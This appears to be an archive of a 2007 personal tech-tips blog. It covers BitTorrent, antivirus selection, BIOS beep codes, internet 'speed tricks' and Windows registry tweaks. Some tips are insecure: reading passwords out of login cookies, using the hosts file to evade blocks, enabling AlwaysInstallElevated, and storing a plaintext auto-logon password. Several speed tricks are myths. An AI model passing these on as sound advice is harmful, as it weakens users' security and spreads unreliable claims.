Dec 26, 2007

Torrents Introduction

What is torrensts ?

Torrent is a peer-to-peer protocol, which allows users to connect directly to each other to send and receive parts of a file through a central server called a "tracker". The tracker itself does not contain or transmit any information pertaining to the actual content. It only coordinates and manages connections between peers.
Introduction
GET A CLIENT In order to use BitTorrent you need to download a Bittorrent client This will allow you to grab the files described in the. Torrent. There are many clients currently available that can be downloaded for free of the web. Here are some of them:
* Original Bittorrent
* Azureus
* Shadow Experimental
* ABC
* Burst
* BT++
* Shareaza
CONFIGURE Once you have downloaded one of the above eventually check the configuration options in order to tune it to your bandwidth (some clients like Azureus have a configuration wizard):
1. Your upload speed shouldn't be set to more than 80 to 90% of your maximum upload speed. For example, if you have a max upload of 25Kb/s your BitTorrent upload speed shouldn't be more than 20 to 22Kb/s. Using all of it would cause your download speed to be severely lowered, this because a small upload percentage is needed by BitTorrent to communicate with the tracker and the other peers.
2. Don't be too generous and restrain the maximum number of uploads -- how many simultaneous leeches will benefit from your seed -- to a reasonable number. Let's say you have one active torrent and 20Kb/s of total bandwidth. With 4 max uploads, 4 people will receive 5Kb/s from you, which is nice. But if you have 3 active torrents and allow 8 uploads, 24 sad guys (3 torrents with 8 connections on each) will only get less than 1Kb/s which is poor
3. When zero means unlimited you shouldn't leave any values anywhere at zero. Indicate high numbers like 99 or less, according to your tastes. It's just a precaution as some clients experienced memory overload while reaching their unlimited limits. Furthermore, zero seldom means "no connections from peers", ie. no seeding... Don't try that unless you want to be banned from our tracker.
BITTORRENT PARTS
Bit Torrenting consists of three parts:
* The Torrent File
* The Tracker
* The Client
The Torrent File:
The torrent file, (created with Maketorrent), contains all the necessary information on what the file is, what tracker it uses to connect people, (or what tracker to announce to), and is essentially a schematic shell of what you want to download, including all file-checking information to ensure that downloaded files match hash checks.
The Tracker:
The tracker is the backbone to the whole system, your client will announce to the tracker at a designated interval, your current status of the transfer. The tracker will then send you a list of all the people/clients it is tracking, and their status, your client will then decipher this list and contact all the other clients and ask for the pieces you need to complete your download.
The Client:
The client is the program that completes the file for you, it will contact the tracker it a designated interval and receive a list of peers, your client will then communicate to each of those peers on the list and ask for the needed parts.
What do all these words mean? (Seeding, uploading,…………)
Here is a brief list of words associated with BitTorrent and their meanings.
torrent
Usually this refers to the small metadata file you receive from the web server (the one that ends in. torrent.) Metadata here means that the file contains information about the data you want to download, not the data itself. This is what is sent to your computer when you click on a download link on a website. You can also save the torrent file to your local system, and then click on it to open the BitTorrent download. This is useful if you want to be able to re-open the torrent later on without having to find the link again.
In some uses, it can also refer to everything associated with a certain file available with BitTorrent. For example, someone might say "I downloaded that torrent" or "that server has a lot of good torrents", meaning there are lots of good files available via BitTorrent on that server.
peer
A peer is another computer on the internet that you connect to and transfer data. Generally a peer does not have the complete file, otherwise it would be called a seed. Some people also refer to peers as leeches, to distinguish them from those generous folks who have completed their download and continue to leave the client running and act as a seed.
seed
A computer that has a complete copy of a certain torrent. Once your client finishes downloading, it will remain open until you click the Finish button (or otherwise close it.) This is known as being a seed or seeding. You can also start a BT client with a complete file, and once BT has checked the file it will connect and seed the file to others. Generally, it's considered good manners to continue seeding a file after you have finished downloading, to help out others. Also, when a new torrent is posted to a tracker, someone must seed it in order for it to be available to others. Remember, the tracker doesn't know anything of the actual contents of a file, so it's important to follow through and seed a file if you upload the torrent to a tracker.
Reseed
When there are zero seeds for a given torrent (and not enough peers to have a distributed copy), then eventually all the peers will get stuck with an incomplete file, since no one in the swarm has the missing pieces. When this happens, someone with a complete file (a seed) must connect to the swarm so that those missing pieces can be transferred. This is called reseeding. Usually a request for a reseed comes with an implicit promise that the requester will leave his or her client open for some time period after finishing (to add longevity to the torrent) in return for the kind soul reseeding the file
Step-By-Step Download Process
1.you use special Torrent search engines to find. Torrent text files around the Net. A. torrent text file functions as a special pointer to locate a specific file and the swarm of people currently sharing that file. These .torrent files vary from 15kb to 150kb file size, and are published by serious Torrent sharers around the world.
2,you download the desired. Torrent file to your drive (this takes about 5 seconds per. torrent file at cable modem speeds).
3.you open the. Torrent file into your Torrent software. Usually, this is as simple as a a double-click on the. Torrent file icon, and the client software auto-launches. In other cases, this software will even open the Torrent file for you.
4.The Torrent client software will now talk to a tracker server for 2 to 10 minutes, while it scours the Internet for people to swarm with. Specifically, the client and tracker server will search for other users who have the same exact .torrent file as you.
5.As the tracker locates Torrent users to swarm with, each user will be automatically labeled as either a “leech/peer” or as a “seed” (users who have only part of the target file, versus users who have the complete target file). As you might guess, the more seeds you connect to, the faster your download will be. Commonly, 10 peers/leeches and 3 seeders is a good swarm for downloading a single song/movie.
6.The client software then begins the transfer. As the name “sharing” implies, every transfer will happen in both directions, “down” and “up” (leech and share).
*SPEED EXPECTATION: Cable and DSL modem users can expect an average of 25 megabytes per hour, sometimes slower if the swarm is small with less than 2 seeders. On a good day with a big swarm, however, you can download a 5MB song within 3 minutes, and a 900MB movie within 60 minutes.
7.Once the transfer is complete, leave your Torrent client software running for at least two hours. This is called "seeding" or "good karma", where you share your complete files to other users.
Suggestion: do your downloads just before you go to sleep at night. This way, you will seed your complete files, you will increase your upload/download ratio, and you will have complete downloaded files by the time you wake up!
8.Movie and music plug-ins: you will likely need to install media players and updated codec converters to play your downloads:
e.g. Windows Media Player, DivX, RealAudio, Daemon Tools Virtual CD/DVD. Click here for details on getting these plug-in players.
e.g. Xp Codec Pack and other coder-decoder converters.
9.Enjoy your movies and songs!
10.Fair warning: you will want a second hard drive once you start serious Torrent downloading. Songs and movies require large disk space, and an average P2P user commonly has 20 to 40 GB of media files at any one time. A second 250GB hard drive is common for serious P2P users, and the recent low prices on hard drives make it a good investment.
Torrent search engine sites are listed below. This list is compiled from hundreds of reader votes, and voted on each week by a small panel of torrent download users.
Isohunt.com
(September, 2007: Isohunt is barring American users from connecting to American torrent trackers. American users, however, can still use Isohunt to find torrents, and connect to third party trackers. If you want to use this tremendous Canadian site, you better use it while you can. Note: any torrent listed as "ISOhunt release" means that it is a file verified by the administrators...a nice feature to help you get authentic torrents, not fake files.)
Torrentspy.com offers over 420,000 torrents in its database, the largest torrent index that is readily available to the public. September 2007 update: Torrentspy has declared that it will be forbidding American users from doing searches on its website, under pressure from the MPAA.
ThePirate Bay.com, by readership size, is the most popular torrent search site today. Pirate Bay also has an immense database of 600,000+ torrents, the single largest database available on the web.
Demonoid Nov 9, 2007 update: The CRIA has threated Demonoid's ISP. Accordingly, Demonoid has shut down entirely for the time being. This is a sad day for torrent downloaders everywhere. Sep. 26, 2007 update: Canadian users can no longer access Demonoid.com. Details are forthcoming, but their Canadian ISP shut them down by court order. The Canadian Recording Industry Association is behind this court order.
Torrentscan.com (a meta-search engine: Torrenscan is a search engine that searches other torrent search engines)

Dec 16, 2007

Tips to select AntiVirus

So you made the decision to Select an AntiVirus (AV) to safeguard your system. But stuck with what to look for in the AV?
------------------------------
Here are some of the tips that will help you in selecting the best AV for your computer:
- Load on System
- Type of subscription
- Ease of Upgradation
- Technical Support
- Frequency of the definitions or updates
Load on System
One of the common complaints from the users is that AV is taking lot of system resources. I think the problem could be caused at the startup of the computer where the most of the programs are configured to load and slow down the system. One way to get around this is to disable or delay or the startup of other applications. Remember it is very essential that AV loads at startup and not at a later time because some of the threats tend to load at startup and if they are allowed to load, they could even disable the AV.
Some of the other tips include, increasing the system RAM or Memory. Not only does this speed up the computing, but also allows you to multitask. Here is an easy and simple way to selectively allow programs to start:
1. Go to Start > Run
2. Type MSCONFIG
3. Click on the Startup tab
4. Uncheck the programs like Adobe, Winamp, MSN /Yahoo/Gtalk Messenger and etc
5. Click OK
Technical Support
Believe me, one factor that is going to have a major impact on your peace of mind is the Technical Support from your vendor on their product. I have seen people tear their hairs on the issues that can arise out of the blue.
Most of the problems arise while installing the product. Make sure you read the minimum hardware requirements, supported OS, incompatibility with other products before you decide to zero in on any product. Such information is published in the vendor website.
NOTE: You should Install and Use only One AntiVirus at a time. Having multiple AV to protect your system can cause all of them to malfunction and allow a threat to affect your system!
Technical support can be free or charged. Normally, free technical support is restricted to Knowledge Base Articles and Email or Chat support. KB articles are a good source of information for known issues and solutions for them. Some AV vendors even run support forum, where the solution comes from people like you and me.
Paid support comes in the form of Telephone calls. Here also you may have to go through the maze of IVRs to actually get to talk to the agent. By the time you get to talk to the agent you may be zapped, this does not end here….but to actually get the solution to your problem, you will have to shell out some money which may not be worthwhile. The charge for the paid support is almost equal to the half of the product price! (remember online search engines Google, Yahoo and MSN search are your friends!)
Frequency of virus definitions/updates
Well, if you think just installing an Antivirus would protect your system, hang on. You will also need to download the updates or antivirus definitions to keep up with the new threats. In this fast changing world of technology, newer threats in the form or Viruses, Worms and Trojans (Click here to read the difference between Viruses Worm and Trojans) come out each day. While it may be difficult for AV companies to keep the pace with all of them, some AV Vendors use heuristics to at least quarantine some of these. Symantec for example uses a technology called as Bloodhound to isolate the malicious threats for which complete information is not known. The common practice is this space for most AntiVirus vendors is to release the updates on a weekly basis. However, if there is an outbreak, the definitions to cure the same are released instantly to prevent any zero day attacks. Read the product information at the vendor’s site carefully to know the frequency of updates. An AV that does not get definitions on a periodic use may not be of much use.
Suggestion: Configure your AV to automatically download and install the updates as and when new updates are released.
Ease of Upgradation
The standard practice in the AntiVirus (AV) vendor space is that each year a newer version of the product is released. More often than not, you may end up upgrading to the newer version. Upgradation basically means installing a newer version over the existing version. So ensure that the AV you buy has the good track record of clean upgradation.
Some AV applications are known to have issues while upgrading from an older version to newer version. If not done correctly, they may leave traces in the registry and can cause major issues while installing. So watch out while you decide to Upgrade or Renew for Updates.
Type of Subscription
AV products generally have usage license for a period of one year. That is you pay and use for one year and after which you will have to renew it in order to receive the AV Updates / Virus definitions. Know the difference between Upgrade and Update.
An update is a periodic Antivirus definition or signature release from the vendor. This can be periodic, for example Symantec releases its Virus definition every Wednesday. Updates include Virus definitions, program improvements, patches etc.
An upgrade is the iteration in the version of the product. For example, you are using Norton Antivirus (NAV) 2007 and it is reaching its one year period and Symantec has now released NAV 2008. You will be presented an option to upgrade to the newer version or continue using the older version by renewing the subscription fees, in which case you will continue to use NAV 2007.
An upgrade normally costs little more than renewal and its better to go for an upgrade because there will bound to be improvements in the newer version.

Beep Code Description

Standard Original IBM POST Error Codes
Code Description
------------------
1 short beep System is OK
2 short beeps POST Error - error code shown on screen No beep Power supply or system board problem Continuous beep Power supply, system board, or keyboard problem Repeating short beeps Power supply or system board problem
1 long, 1 short beep System board problem
1 long, 2 short beeps Display adapter problem (MDA, CGA)
1 long, 3 short beeps Display adapter problem (EGA)
3 long beeps 3270 keyboard card
IBM POST Diagnostic Code Descriptions
-------------------------------------
100 - 199 System Board
200 - 299 Memory
300 - 399 Keyboard
400 - 499 Monochrome Display
500 - 599 Colour/Graphics Display
600 - 699 Floppy-disk drive and/or Adapter
700 - 799 Math Coprocessor
900 - 999 Parallel Printer Port
1000 - 1099 Alternate Printer Adapter
1100 - 1299 Asynchronous Communication Device, Adapter, or Port
1300 - 1399 Game Port
1400 - 1499 Colour/Graphics Printer
1500 - 1599 Synchronous Communication Device, Adapter, or Port
1700 - 1799 Hard Drive and/or Adapter
1800 - 1899 Expansion Unit (XT)
2000 - 2199 Bisynchronous Communication Adapter
2400 - 2599 EGA system-board Video (MCA)
3000 - 3199 LAN Adapter
4800 - 4999 Internal Modem
7000 - 7099 Phoenix BIOS Chips
7300 - 7399 3.5" Disk Drive
8900 - 8999 MIDI Adapter
11200 - 11299 SCSI Adapter
21000 - 21099 SCSI Fixed Disk and Controller
21500 - 21599 SCSI CD-ROM System
AMI BIOS Beep Codes Code Description
------------------------------------
1 Short Beep System OK
2 Short Beeps Parity error in the first 64 KB of memory
3 Short Beeps Memory failure in the first 64 KB
4 Short Beeps Memory failure in the first 64 KB Operational of memory
or Timer 1 on the motherboard is not functioning
5 Short Beeps The CPU on the motherboard generated an error
6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
7 Short Beeps The CPU generated an exception interrupt
8 Short Beeps The system video adapter is either missing, or its memory is faulty
9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
10 Short Beeps The shutdown register for CMOS RAM failed
11 Short Beeps The external cache is faulty
1 Long, 3 Short Beeps Memory Problems
1 Long, 8 Short Beeps Video Card Problems
Phoenix BIOS Beep Codes
-----------------------------
Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.
Code Description
-----------------------------
1-1-3 CMOS read/write failure
1-1-4 ROM BIOS checksum error
1-2-1 Programmable interval timer failure
1-2-2 DMA initialisation failure
1-2-3 DMA page register read/write failure
1-3-1 RAM refresh verification failure
1-3-3 First 64k RAM chip or data line failure
1-3-4 First 64k RAM odd/even logic failure
1-4-1 Address line failure first 64k RAM
1-4-2 Parity failure first 64k RAM
2-_-_ Faulty Memory
3-1-_ Faulty Motherboard
3-2-4 Keyboard controller Test failure
3-3-4 Screen initialisation failure
3-4-1 Screen retrace test failure
3-4-2 Search for video ROM in progress
4-2-1 Timer tick interrupt in progress or failure
4-2-2 Shutdown test in progress or failure
4-2-3 Gate A20 failure
4-2-4 Unexpected interrupt in protected mode
4-3-1 RAM test in progress or failure>ffffh
4-3-2 Faulty Motherboard
4-3-3 Interval timer channel 2 test or failure
4-3-4 Time of Day clock test failure
4-4-1 Serial port test or failure
4-4-2 Parallel port test or failure
4-4-3 Math coprocessor test or failure
Low 1-1-2 System Board select failure
Low 1-1-3 Extended CMOS RAM failure

Dec 9, 2007

Internet tips

Increase u r internet Speed........
Trick 1.
follow the step:-
go to desktop->My computer-(right click on)->properties->then go HARDWARE tab->Device
manager-> now u see a window of Device manager
then go to Ports->Communication Port(double click on it and Open).
after open u can see a Communication Port properties.
go the Port Setting:----
and now increase ur "Bits per second" to 128000.
and "Flow control" change 2 Hardware.
Trick 2.
type this coding in notepad and save as .reg and then execute this file....this will increase ur surfing n downloading speed.....
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters]
"SackOpts"=dword:00000001
"TcpWindowSize"=dword:0005ae4c
"Tcp1323Opts"=dword:00000003
"DefaultTTL"=dword:00000040
"EnablePMTUBHDetect"=dword:00000000
"EnablePMTUDiscovery"=dword:00000001
"GlobalMaxTcpWindowSize"=dword:0005ae4c
Trick 3.
follow these steps:-
1.Click on Start, Run, gpedit.msc, .
2. On the window that will show up, click on Administrative Templates, Network, QoS Packet Scheduler
3. On the right side pane, double click Limit reservable bandwidth. Change this configuration from “not configured” to “Enabled” and the reduce Bandwidth limit (%) from 20% to 0.
4. Click on Ok and restart your computer.
Trick4:
Improve your dialup modem preformance
You can't assume that just because you connected at a speed like 48.3KBps that you will stay there. Today's modems automatically fall back to a lower speed if the line noise is too high to maintain a faster connection, but sometimes they fall back too soon or too far.
Here's how to do it:
Click Start the button.
Select Settings.
Click Control Panel.
Double-click on the Modems icon.
Select your modem.
Click the Properties button.
Click the Connections tab.
Click the Advanced button.
In the "Extra settings" field, type S36=7
Click OK to save your settings.
This will force your modem to try to stay connected at high speeds in two different ways before dropping back to an asynchronous mode with auto speed buffering.
Trick5:
Increase the speed of your internet connection without a new modem
As more and more people get quick connections to the internet, such as cable or ADSL, it becomes apparent to the user of a simple dial-up modem that the World Wide Web can quickly turn into the World Wide Wait. Here a trick that can help speed up your current modem without shelling out the big bucks.
There is a setting located in your windows registry called the Maximum Transfer Unit (MTU). This determines the size of the packets of data sent between your and your server. In Windows 95, this setting is has a value of 1,500 bytes when the actual size of internet packets is 1,000 bytes. This can sometimes slow things down. To remedy the situation, simply follow these steps:
In the registry editor (Start > Run > regedit.exe),
navigate to
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans. In the NetTrans folder you should find another folder named "000x" in which x represents a fourth digit. Right-click on the "000x" folder and select New and StringValue. Rename the item that appears in the panel on the right side to MaxMTU, then double-click it to bring up the Edit String box and give it a velue of 1002.

Remember to keep playing with the MaxMTU value until you feel that your internet connection has greatly sped up. Some people report huge speed gains using this tricks, while others hardly notice a difference. In any case, it's definetly worth a try.
Running Network Diagnostics
Network Diagnostics scans your system to gather information about your hardware, software, and network connections.
Start / Run / NETSH DIAG GUI
The following is the type of information that can be displayed:
* Ping
* Connect
* Show
* Verbose
* Save to Desktop
* Mail Service
* News Service
* Internet Proxy Server
* Computer Information
* Operating System
* Windows Version
* Modems
* Network Clients
* Network Adapters
* Domain Name System (DNS)
* Dynamic Host Configuration Protocol (DHCP)
* Default Gateways
* Internet Protocol Address
* Windows Internet Naming Service (WINS)
IP Commands
Display Connection Configuration: ipconfig /all
Display DNS Cache Info Configuration: ipconfig /displaydns
Clear DNS Cache:ipconfig /flushdns
Release All IP Address Connections: ipconfig /release
Renew All IP Address Connections IP Configuration: ipconfig /renew
Refresh DHCP and Re-Register the DNS connections: ipconfig /registerdns
Display DCHP Class Information: ipconfig /showclassid
Change/Modify DHCP Class ID: ipconfig /setclassid
Network Connections:control netconnections
Network Setup Wizard: netsetup.cpl
Test Connectivity: ping Example: ping www.naveenvnksg.blogspot.com
Trace IP address Route: tracert
Displays the TCP/IP protocol sessions: netstat
Display Local Route: route
Display Resolved MAC Addresses: arp
Chat with command prompt
If you want personal chat with a friend
you don't need to download any yahoo messenger
all you need is your friends IP address and Command Prompt.
Firstly, open Notepad and enter:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
Now save this as "Messenger.bat". Open the .bat file and in Command
Prompt you should see:
MESSENGER
User:
After "User" type the IP address of the computer you want to contact.
After this, you should see this:
Message:
Now type in the message you wish to send.Before you press "Enter" it should look like this:
MESSENGER
User:27.196.391.193
Message: Hi Naveen
Now all you need to do is press "Enter", and start chatting!
Javascript Fun [Edit Any Webpage]edit any web page...........
Use javascript to edit any web-site (just for fun).
Go to the web-site that you want to edit and at the adress bar type this:
javascript:nick=document.body;nick.contentEditable='true'; document.designMode='on'; void 0
You can login with multiple id's on the same yahoo messenger without any download or patch.
Follow these steps:
1.Go to Start > Run . Type regedit, and then enter.
2.Navigate to HKEY_CURRENT_USER > Software>yahoo>pager>Test
3.On the right page, right-click and choose new Dword value.
4.Rename it as Plural.
5.Double click and assign a decimal value of 1.
It’s done!!
Now close registry and restart yahoo messenger and try Multiple Login
How to find the IP address of the sender in Gmail, Yahoo! mail or Hotmail
When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers.
Finding IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original
4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets
That is be the IP address of the sender!
5. Track the IP address of the sender
Finding IP address in Yahoo! Mail
1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail
5. You should see similar headers like this:
Yahoo! Headers: name
Look for Received: from followed by the IP address between square brackets [ ].
That is be the IP address of the sender!
6. Track the IP address of the sender
Finding IP address in Hotmail
1. Log into your Hotmail account with your username and password.
2. Click on the Mail tab on the top.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed. To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked
* Click on Ok button
* Go back to the mails and open that mail
5. If you find a header with X-Originating-IP: followed by an IP address, that is the sender's IP address
Hotmail headers : name ,In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.
6. If you find a header with Received: from followed by a Gmail proxy like this
Hotmail headers : name
Look for Received: from followed by IP address within square brackets[].
Multi Google Talk
Just follow the simple steps Below:
1)Right click on the Google Talk shortcut.
2)click on Properties.
3)Go to Shortcut tab on Google Talk Properties window.
4)On the Target textbox, add in the /nomutex to the end of the line so that it looks like below (or you can simply copy and paste the below syntax and replace the original).
“c:\program files\google\google talk\googletalk.exe” /nomutex
5)Click on OK.
I didn't have to do anything after this nd clicking on the shortcut multiple times just gave me different google talk window.
Alternative
To create a new shortcut for Google Talk:
1)Right-click on the desktop or anywhere you want to place the GTalk shortcut.
2)Select New on the right click context menu.
3)Then select Shortcut.
4)Copy and paste the following line to the text box when prompted to type the location of the item:
“c:\program files\google\google talk\googletalk.exe” /nomutex
5)Click on Next.
6)Give the shortcut a proper name such as Google Talk or Google
Talk Multiple or Google Talk Polygamy.
8)Click OK until you are done.
Block Or Unblock Websites without software !
Many times in schools, colleges & offices surfing some sites like orkut,etc are banned !To overcome this you can unblock these or block some other websites and play pranks !Do The Following :fFor eg you want to block www.xyz.com !* Open the folder C:WINDOWSsystem32driversetc* There you will find a file named HOSTS* Click on the file and press SHIFT and now right click on it .* From the right click menu select Open with .* Now, select Notepad to open the file from the list !* Now, in the file under the line 127.0.0.1 localhost add another line as 127.0.0.2 www.xyz.com.* Now, File>>Save !Now, open your web browser and try openning www.xyz.com , it will not load !To unblock sites just do the vice versa !
Reading Cookies
well.... reading cookies is not a big deal... all u need to do is use some sense & logics...
let me explain wit example:
First-> Delete all the cookies from your pc's.
Now go to orkut & login wit ur user id & password.
Now go to cookies folder & see how many cookies r stored there... you will find many cookies.... now start reading/opening all the cookies.... in some cookies... u will find something like
[Client-side-data]
continue=https%3A%2F%2Fwww.orkut.com%2FRedirLogin.aspx%3Fmsg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&service=orkut&nui=2&uilel=1&skipvpage=true&hl=en-US&GA3T=OVAG8WM5ZYo&Email=GMAIL_ID&Passwd=GMAIL_PASSWORD%23&PersistentCookie=yes&rmShown=1&null=Sign+in
[Server-side-data]
HTTP/1.1 200 OK
Set-Cookie: GoogleAccountsLocale_session=en

Nov 22, 2007

Collection of Antivirus links

1.Kaspersky

2. Active Virus Shield by AOL

3. ZoneAlarm with KAV Antivirus

4. F-Secure

5. BitDefender Professional

6. BullGuard

7. Ashampoo

8. eScan

9. Nod32

10. CyberScrub

11. Avast Professional

12. AVG

13. F-Prot

14. McAfee

15. Panda

16. Norman

17. ArcaVir

18. Norton Professional

19. PC-Cillin

20. Sophos Sweep

21. Comodo

22. Abacre

23. A-Squared Anti-Malware

24. ClamWin

25. quickheal

26. Avira

27. Windows Live OneCare

28. Principal AntiVirus

There aren’t many free antivirus solutions that made the list, or were even tested for that matter. Active Virus Shield is completely free. Both AVG and Avast have a free version that they offer, but their paid solutions were tested instead.

Nov 21, 2007

Windows tweaks 4

151. Remove the DFS tab from Windows Explorer

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoDFSTab
Set this DWORD to 1 to remove the DFS tab from Windows Explorer so that you can prevent users from changing properties on local DFS shares.
152. Disable Windows 2000's Scheduled Tasks drag-and-drop functionality
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\
TaskScheduler5.0\DragAndDrop
Set this DWORD value to 1 disable the Drag and Dropt functionality of the Scheduled Tasks folder.
153. Reinstall Outlook Express 6.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Active Setup\Installed Components\{44BBA840…..}\IsInstalled
Set this DWORD value to 0 will make Windows think that Outlook Express 6 is not installed. You should then be able to reinstall Outlook Express 6.
154. Load Balancing Your Network Cards
HKEY_Local_Machine\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\RandomAdapter HKEY_Local_Machine\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SingleResponse Set these values to 1 to enable load balancing if you have more than 1 network card. Changing the values to 0 disables this ability.
155. Keep Dial-up Connections Running When You Log Off
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Winlogon\KeepRASConnections
Setting this STRING value to 1 will keep an active dial-up connection connected when a user logs off.
156. Suppress the Standard Machine Beep Noise
HKEY_CURRENT_USER\Control Panel\Sound\Beep
Set this value to no to stop your system from beeping with system-level events.
157. Change the Location For Storing Your Crash Dump
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DrWatson\CrashDumpFile
Change this location to a location of your choice where you want to store any Crash Dump files created by the system.
158. Disable Task Manager
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\SystemDisableTaskMgr (Windows NT/2000/XP)
Set this value to 1 to disable Task Manager for your users. A value of 0 will enable Task Manager.
159. Enable File And Directory Name Completion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
(Windows NT/2000/XP)
Set this REG_DWORD to 9. Now when you type the first few letters of a file or folder name and press [Tab] on the keyboard, the OS automatically completes the path. If you press [Tab] again, it will go through several files and folders that match the same pattern. This applies only to Cmd.exe and not any other command-line environments.
160. Specify which disk-error-checking utility I want to use in Windows 2000 and later
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\ChkDskPath Set this to the path of the program you’d like to use for disk-checking.
161. Disable Fast Shutdown
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Shutdown\FastReboot
Change this value to 0 to disable fast shutdown in Windows 98.
162. Save Notepad Settings
HKEY_CURRENT_USER\Software\Microsoft\Notepad\fSavePageSettings
Set this value to 1 to save Notepad settings.
163. Save Notepad Window Position
HKEY_CURRENT_USER\Software\Microsoft\Notepad\fSaveWindowPositions
Set this value to 1 to save Notepad window position.
164. End Tasks Automatically
HKEY_CURRENT_USER\ControlPanel\Desktop\AutoEndTasks
Set this to 1 to automatically end tasks instead of seeing the End Task prompt, when an application is waiting to close.
165. Disable Windows Messenger
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Messenger\Client\PreventRun
(Windows XP)
Set this DWORD value to 1 to prevent Windows Messenger from running
166. Disable Windows 2000 Web Printing
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\ DisableWebPrinting
Set this DWORD value to 1 to disable web printing in Windows 2000.
167. Windows Media Player 7 Automatic Updates
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsMediaPlayer\DisableAutoUpdate Set this DWORD value to 1 to disable automatic updates. Set it to 0 to enable automatic updates
168. Configure Microsoft Internet Explorer start and search pages
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
Changes these values to customize your start and search pages
169. Configure multiple concurrent IE download sessions to one server?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\MaxConnectionsPerServer
Set these DWORD values to the hexadecimal value for the number of connections you desire
170. Edit Disk Space Warning Message
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters\DiskSpaceThreshold Set this REG_DWORD value to the integer within the range of 0 to 99. This number represents the percentage of free space on the hard drive. When the free space drops below this percentage, the event is triggered.
171. Remember Windows XP Customized Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\BagMRU
Set this DWORD value to be the number of folders you want XP to remember
172. Remove Windows XP Notification Area
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayItemsDisplay Set this DWORD value to 1 to hide the Windows XP notification area
173. Stop Windows from caching a .dll file after I close the program that was accessing it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Explorer\AlwaysUnloadDLL
Set this DWORD value to 1 to unload DLLs immediately when a program is closed.
174. Disable the Windows Installer rollback functionality
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\DisableRollback HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer\DisableRollback
Set this DWORD value to 1
175. Configure all Windows Installer installations to run with elevated privileges
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated Set this DWORD value to 1
registry subkey.
176. Change the system font
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
Change the "FONTS.FON"="vgasys.fon" value to be the font name you wish to display
177. Disable Last Access Time Stamp in NTFS
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisableLastAccessUpdate Change this DWORD value to 1 if you want to stop an NTFS volume from updating the LastAccess time stamp for every directory browsed
178. Set a limit on message recipients in Microsoft Exchange 5.5
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSExchangeIS\ParametersSystem\Max Recipients On Submit
Set this DWORD value to the maximum number of recipients you wish to allow.
179. Automatically log onto your workstation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
"DefaultUserName"="YourLogon"
"DefaultDomainName"="YourDomain"
"AutoAdminLogon"="1"
"DefaultPassword"="YourPassword"
Change DefaultUserName, DefaultDomainName, and DefaultPassword to values specific to your network.
180. Disable the Log Off Computer button
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\StartMenuLogoff Set this DWORD value to 1 to remove the Log Off button. Set it back to 0 if you want people to be able to log off the computer
181. Disable the Turn Off Computer button
